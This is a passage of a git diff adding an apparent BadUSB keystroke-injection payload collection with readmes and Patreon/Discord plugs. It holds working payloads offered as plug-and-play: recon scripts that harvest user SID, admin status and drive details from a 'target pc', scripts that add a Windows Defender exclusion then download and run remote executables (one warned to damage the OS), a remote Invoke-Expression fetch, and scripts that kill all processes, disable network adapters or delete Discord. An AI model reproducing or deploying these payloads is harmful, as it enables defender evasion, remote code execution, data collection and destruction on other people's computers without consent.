';$u = 0;$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace);$Report = $Report + '
'
+ENTER
+STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html'
+ENTER
+STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/readme.md
new file mode 100644
index 000000000..269abd176
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/readme.md
@@ -0,0 +1,38 @@
+
+# USB_And_Harddrive_Information
+Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
+
+## How to use?
+
+This script is not plug and play. You need to do the following changes:
+
+- change the path of the file "-DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip"
+
+
+## Features
+
+- open powershell
+- get hardware info
+- save infos to a file
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/Win_User_Info.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/Win_User_Info.txt
new file mode 100644
index 000000000..036c57ced
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/Win_User_Info.txt
@@ -0,0 +1,21 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Saves some general Info about the current Win-User.
+REM Version: 1.0
+REM Category: Exfiltration
+DELAY 750
+WINDOWS d
+DELAY 900
+WINDOWS r
+DELAY 900
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 750
+LEFTARROW
+ENTER
+DELAY 900
+ALT y
+DELAY 900
+STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-57059022.html';$Report = $Report + "
Walkuer Ghost Report
Generated on: $Date
";$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired;$UserType = $UserInfo.AccountType;$UserSid = $UserInfo.SID;$UserPass = $UserInfo.PasswordRequired;$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator');$Report = $Report + "
User Information
Current User Name: | $env:USERNAME |
Account Type: | $UserType |
User SID: | $UserSid |
Account Domain: | $env:USERDOMAIN |
Password Required: | $UserPass |
Current User is Admin: | $IsAdmin |
";$Report = $Report + "
";$Report >> $fileSaveDir'/ComputerInfo-57059022.html'
+ENTER
+STRING Compress-Archive -Path $fileSaveDir -DestinationPath C:\PATH TO SAVE HERE\FILEresults-57059022.zip ; exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/readme.md
new file mode 100644
index 000000000..b0cc64dd5
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/readme.md
@@ -0,0 +1,38 @@
+
+# Win_User_Info
+Saves some general Info about the current Win-User and stores it to a file.
+
+## How to use?
+
+This script is not plug and play. You need to do the following changes:
+
+- change the path of the file "C:\PATH TO SAVE HERE\FILEresults-57059022.zip"
+
+
+## Features
+
+- open powershell
+- get win user info
+- save info to a file
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/JustAmongUs.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/JustAmongUs.txt
new file mode 100644
index 000000000..15d85ac3c
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/JustAmongUs.txt
@@ -0,0 +1,19 @@
+REM Author: AGO061
+REM Description: AmongUs takes over the PC!!!
+REM Version: 1.0
+REM Category: FUN
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/badusb-payloads/releases/download/SUS-R1/sus.exe';$file='sus.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/readme.md
new file mode 100644
index 000000000..73ebb29a8
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/JustAmongUs/readme.md
@@ -0,0 +1,35 @@
+
+# JustAmongUs
+Please be really careful with this. I will not be responsible for any damage. This script can/will damage your OS.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- download sus.exe
+- run sus.exe
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/RickRoll_IntoBSOD.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/RickRoll_IntoBSOD.txt
new file mode 100644
index 000000000..c4c87c1f2
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/RickRoll_IntoBSOD.txt
@@ -0,0 +1,22 @@
+REM Title: Rick-Roll BSOD
+REM Author: FalsePhilosopher + AGO061
+REM Target: Win 10+, exe is Windows 7 and up 32/64 bit
+REM Props: Hak5, bemxio for creating mario-head https://github.com/bemxio/mario-head, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes, AGO061 for making the rickroll version
+REM Version: 1.0
+REM Category: Prank
+REM Display a video of a rick rolll, the video glitches and explodes and invokes a BSOD.
+DELAY 400
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 850
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1000
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/rickroll-bsod/releases/download/first-version/rick_dist.exe';$file='rick_dist.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/readme.md
new file mode 100644
index 000000000..d8968cb43
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/CarefulWithThis/RickRoll_IntoBSOD/readme.md
@@ -0,0 +1,35 @@
+
+# RickRoll_IntoBSOD
+Please be really careful with this. I will not be responsible for any damage. This script can/will damage your OS.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- download rick_dist.exe
+- run rick_dist.exe
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/Cartman.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/Cartman.txt
new file mode 100644
index 000000000..af5732aae
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/Cartman.txt
@@ -0,0 +1,9 @@
+REM ---------CARTMAN SPAM----------
+REM -- by Mr-Savag3 --- 09162022 --
+REM -- updated to 1 line by -------
+REM ---------------- I Am Jakoby --
+DELAY 500
+GUI r
+DELAY 600
+STRING powershell -w h $k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $k;$i++){$o.SendKeys([char] 175)}; 1..10|foreach {saps https://www.youtube.com/watch?v=U3sAkAWfxLY;sleep 1;$o.SendKeys('f')}
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/readme.md
new file mode 100644
index 000000000..5362166cf
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Cartman/readme.md
@@ -0,0 +1,35 @@
+
+# Cartman
+Opens a weird cartman clip on youtube and turns the volume up to 100%.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open youtube video
+- turn volume up
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/change_dpi150.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/change_dpi150.txt
new file mode 100644
index 000000000..bf30a6a99
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/change_dpi150.txt
@@ -0,0 +1,18 @@
+REM Author: UNC0V3R3D
+REM Description: Uses the monitor DPI to change the zoom to 150%.
+REM Version: 1.0
+REM Category: FUN
+DELAY 800
+GUI r
+DELAY 800
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 800
+ENTER
+DELAY 800
+LEFTARROW
+DELAY 800
+ENTER
+DELAY 500
+STRING Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/UNC0V3R3D/resources/main/dpi_code.ps1").Content
+DELAY 200
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/readme.md
new file mode 100644
index 000000000..bb8fd60a8
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Change_Zoom/readme.md
@@ -0,0 +1,31 @@
+# Change_Zoom
+Uses the monitor DPI to change the zoom to 150%.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- change monitor dpi
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/ComputerTalks.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/ComputerTalks.txt
new file mode 100644
index 000000000..bacac7a61
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/ComputerTalks.txt
@@ -0,0 +1,12 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Makes the computer speak
+REM Version: 1.0
+REM Category: FUN
+DELAY 750
+WINDOWS d
+DELAY 950
+WINDOWS r
+DELAY 650
+STRING powershell.exe -nop -win hidden -c "Add-Type -AssemblyName System.speech; $synth = New-Object System.Speech.Synthesis.SpeechSynthesizer; $synth.Speak('Hello you behind the Screen, I am inside your PC.')"
+DELAY 100
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/readme.md
new file mode 100644
index 000000000..4bd73df50
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/ComputerTalks/readme.md
@@ -0,0 +1,37 @@
+
+# ComputerTalks
+Makes the computer speak.
+
+## How to use?
+
+This script is not plug and play. You need to do the following changes:
+
+- change the text if you WANT to "$synth.Speak('Hello you behind the Screen, I am inside your PC.')""
+
+
+## Features
+
+- open powershell
+- use system.speech to talk
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/deactivate_networkadapters.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/deactivate_networkadapters.txt
new file mode 100644
index 000000000..076eeabdc
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/deactivate_networkadapters.txt
@@ -0,0 +1,20 @@
+REM Author: UNC0V3R3D
+REM Description: Uses the device manager to deactivate all networkadapters.
+REM Version: 1.0
+REM Category: FUN
+DELAY 800
+GUI r
+DELAY 800
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 800
+ENTER
+DELAY 800
+LEFTARROW
+DELAY 800
+ENTER
+DELAY 500
+STRING Get-NetAdapter | ForEach-Object { Disable-NetAdapter -Name $_.Name -Confirm:$false }
+ENTER
+DELAY 1000
+STRING exit
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/readme.md
new file mode 100644
index 000000000..599878595
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Deactivate_Networkadapters/readme.md
@@ -0,0 +1,32 @@
+# Deactivate_Networkadapters
+Uses the device manager to deactivate all networkadapters.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open device manager (powershell)
+- deactivate adapters
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/delete_discord.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/delete_discord.txt
new file mode 100644
index 000000000..76a788bb6
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/delete_discord.txt
@@ -0,0 +1,20 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Deletes discord if it exists on the target pc.
+REM Version: 1.0
+REM Category: Fun
+DELAY 500
+GUI r
+DELAY 300
+REM Start PowerShell as Admin
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 300
+ENTER
+DELAY 500
+LEFTARROW
+DELAY 450
+ENTER
+DELAY 600
+REM delete discord
+STRING if (Test-Path "C:\Program Files (x86)\Discord") { Remove-Item -Recurse -Force "C:\Program Files (x86)\Discord"; Write-Output "Deleted Discord from $discordPath" } else { Write-Output "Discord is not installed on this computer." }; exit
+DELAY 200
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/readme.md
new file mode 100644
index 000000000..7d7292830
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Delete_Discord/readme.md
@@ -0,0 +1,36 @@
+
+# Delete_discord
+Checks if discord is installed on the target, if it is installed it will delete discord.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- check if discord is installed
+- delete discord if exists
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/Destroy_Pc_with_tabs.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/Destroy_Pc_with_tabs.txt
new file mode 100644
index 000000000..2b278e921
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/Destroy_Pc_with_tabs.txt
@@ -0,0 +1,37 @@
+REM Author: overwraith
+REM Description: Opens a few Tabs...
+REM Version: 1.0
+REM Category: FUN
+DELAY 1200
+GUI r
+DELAY 400
+STRING cmd /Q /D /T:0a /F:OFF /V:OFF /K
+DELAY 500
+ENTER
+DELAY 750
+STRING DEL /Q MobileTabs.vbs
+ENTER
+STRING copy con MobileTabs.vbs
+ENTER
+STRING on error resume next
+ENTER
+STRING navOpenInBackgroundTab = &h1000
+ENTER
+STRING set oIE = CreateObject("InternetExplorer.Application")
+ENTER
+STRING Set args = WScript.Arguments
+ENTER
+STRING oIE.Navigate2 args.Item(0)
+ENTER
+STRING for intx = 1 to args.count
+ENTER
+STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
+ENTER
+STRING next
+ENTER
+STRING oIE.Visible = true
+ENTER
+CONTROL z
+ENTER
+STRING MobileTabs.vbs "http://www.google.com/" "http://mwomercs.com/" "http://hak5.org/" "http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/readme.md
new file mode 100644
index 000000000..cd91144f6
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Destroy_Pc_with_tabs/readme.md
@@ -0,0 +1,35 @@
+
+# Destroy_Pc_with_tabs
+Opens a few tabs... maybe too many.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- use system.speech to talk
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/end_processes.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/end_processes.txt
new file mode 100644
index 000000000..e7ecbf4fa
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/end_processes.txt
@@ -0,0 +1,17 @@
+REM Author: UNC0V3R3D
+REM Description: Uses the taskmanager and tries to end all processes
+REM Version: 1.0
+REM Category: FUN
+DELAY 800
+GUI r
+DELAY 800
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 800
+ENTER
+DELAY 800
+LEFTARROW
+DELAY 800
+ENTER
+DELAY 500
+STRING Start-Process taskmgr.exe -WindowStyle Hidden; Get-Process | Where-Object { $_.Name -ne "taskmgr" } | Stop-Process -Force
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/readme.md
new file mode 100644
index 000000000..5b7e59801
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/End_Processes/readme.md
@@ -0,0 +1,32 @@
+# End_Processes
+Uses the taskmanager and tries to end all processes
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open taskmanager
+- end all processes
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/FakeBluescreen.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/FakeBluescreen.txt
new file mode 100644
index 000000000..80ab1438f
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/FakeBluescreen.txt
@@ -0,0 +1,14 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Opens a Website with an fake Bluescreen and setting it to fullscreen
+REM Version: 1.0
+REM Category: FUN
+DELAY 500
+GUI r
+DELAY 400
+STRING cmd
+ENTER
+DELAY 500
+STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html
+ENTER
+DELAY 1000
+F11
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/readme.md
new file mode 100644
index 000000000..f48655b36
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeBluescreen/readme.md
@@ -0,0 +1,35 @@
+
+# FakeBluescreen
+Opens a website that has a fake BSOD and maximizes the window.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open website
+- maximize window
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/FakeUpdateWindows.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/FakeUpdateWindows.txt
new file mode 100644
index 000000000..826baaeed
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/FakeUpdateWindows.txt
@@ -0,0 +1,14 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Opens a Website with an fake Update and setting it to fullscreen
+REM Version: 1.0
+REM Category: FUN
+DELAY 500
+GUI r
+DELAY 400
+STRING cmd
+ENTER
+DELAY 500
+STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/
+ENTER
+DELAY 1000
+F11
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/readme.md
new file mode 100644
index 000000000..30bcf3789
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeUpdateWindows/readme.md
@@ -0,0 +1,35 @@
+
+# FakeUpdateWindows
+Opens a website that has a fake windows update and maximizes the window.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open website
+- maximize window
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/FakeVirus.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/FakeVirus.txt
new file mode 100644
index 000000000..62a9eea7d
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/FakeVirus.txt
@@ -0,0 +1,14 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Opens a Website with an fake Virus and setting it to fullscreen
+REM Version: 1.0
+REM Category: FUN
+DELAY 500
+GUI r
+DELAY 400
+STRING cmd
+ENTER
+DELAY 500
+STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/wnc/
+ENTER
+DELAY 1000
+F11
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/readme.md
new file mode 100644
index 000000000..51eda9dc8
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/FakeVirus/readme.md
@@ -0,0 +1,35 @@
+
+# FakeVirus
+Opens a Website with an fake Virus and setting it to fullscreen.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open website
+- maximize window
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/Matrix_Rain_CMD.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/Matrix_Rain_CMD.txt
new file mode 100644
index 000000000..7a5312e1a
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/Matrix_Rain_CMD.txt
@@ -0,0 +1,51 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: There'll be the matrix rain in the cmd
+REM Version: 1.0
+REM Category: FUN
+DELAY 1000
+GUI r
+DELAY 100
+STRING notepad
+ENTER
+DELAY 100
+STRING @echo off
+ENTER
+ENTER
+DELAY 100
+STRING color 02
+ENTER
+ENTER
+DELAY 100
+STRING mode 1000
+ENTER
+ENTER
+DELAY 100
+STRING :matrixbynima
+ENTER
+ENTER
+DELAY 100
+STRING echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
+ENTER
+ENTER
+DELAY 100
+STRING goto matrixbynima
+ENTER
+DELAY 100
+CTRL S
+DELAY 200
+REM change %userprofile% to your user or the devices user that your using this on
+STRING %userprofile%\Desktop\matrix.bat
+ENTER
+DELAY 1000
+GUI r
+DELAY 100
+STRING cmd
+ENTER
+DELAY 100
+STRING cd %userprofile%\Desktop\
+ENTER
+DELAY 50
+STRING matrix.bat
+ENTER
+DELAY 1500
